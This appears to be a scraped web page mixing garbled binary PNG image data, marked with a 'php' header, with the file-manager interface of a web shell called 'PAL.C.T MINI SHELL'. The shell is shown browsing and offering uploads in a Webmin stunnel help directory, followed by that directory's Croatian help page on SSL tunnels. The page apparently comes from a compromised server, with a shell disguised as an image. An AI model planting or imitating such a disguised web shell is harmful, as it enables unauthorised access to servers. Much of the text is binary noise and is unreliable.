php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.hr.auto.html

<header> Uvod u SSL tunele </header> SSL je protokol za šifriranje podataka u TCP vezi dok putuje mrežom. Prvobitno je razvijena za zaštitu prometa između web preglednika i poslužitelja, ali može se koristiti za šifriranje bilo koje vrste toka podataka koji se obično šalju preko TCP protokola. <p> SSL protokol omogućava klijentima i poslužiteljima da se autentificiraju jedni druge, tako da klijent može biti siguran da se stvarno povezuje s domaćinom za kojeg misli da jeste. To se vrši pomoću certifikata koje izdaje tijelo certifikata koje je klijent prepoznao (tako da se mogu ovjeriti) i povezani s određenim imenom hosta. Bez certifikata napadač bi mogao ponovno usmjeriti SSL vezu na vlastiti poslužitelj i uhvatiti osjetljive podatke klijenta za koji misli da govori sa stvarnim serverom. <p> Svi podaci koji putuju Internetom nešifrirani mogu napadač zabilježiti i pročitati pristup jednoj od mreža kroz koju prolazi. Čak se i podaci koji putuju između klijenta i poslužiteljskog sustava na LAN-u mogu lako slušati. Kad se povežete s telnet, FTP ili POP3 serverom, vaša se lozinka šalje putem mreže i tako napadač može snimiti. <p> SSL se može koristiti za zaštitu podataka u takvim situacijama, ali samo ako ih i klijent i poslužitelj podržavaju. Većina web preglednika i klijent e-pošte može uspostaviti HTTP, POP3 i IMAP veze zaštićene SSL-om, ali ne mogu ih prihvatiti svi web i POP3 poslužitelji. POP3 je posebno teško zaštititi, jer standardni poslužitelj koji dolazi s većinom Unix sustava uopće ne podržava SSL. Srećom iako postoji rješenje - STunnel. <p> STunnel je jednostavan program koji pretvara nekodiranu vezu u SSL šifriranu vezu. Obično se postavlja kako bi se pokrenuo s super poslužitelja kao što je inetd ili xinetd, a zatim pokrenite neki drugi program poput POP3 poslužitelja koji ne podržava SSL. Ovaj dizajn omogućuje mu da zaštiti bilo koji poslužitelj koji se normalno pokreće s inetd-a, kao što su telnet, NNTP i IMAP poslužitelji. <p> Međutim, ne mogu svi poslužitelji biti zaštićeni šifriranjem, jer ne postoji klijent da ih koristi u SSL načinu. Na primjer, nikad nisam čuo za telnet ili FTP klijent koji može koristiti SSL, jer zajednički SSH paket već omogućava šifrirane udaljene prijave i prijenose datoteka. <p> Ovaj Webmin modul olakšava postavljanje usluga super poslužitelja koji izvode STunnel za pokretanje nekog poslužiteljskog programa. Iako se to može učiniti ručno pomoću modula Internet Services, ovaj je posebno dizajniran za postavljanje i konfiguriranje STunnela. Automatski otkriva da li ste instalirali inetd i / ili xinetd, čita njihove konfiguracije za provjeru postojećih SSL tunela i dodaje ih prilikom stvaranja novog tunela. Ako su oba instalirana, u konfiguraciju xinetd dodaju se novi SSL tuneli jer je po mom mišljenju ona superiorna. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`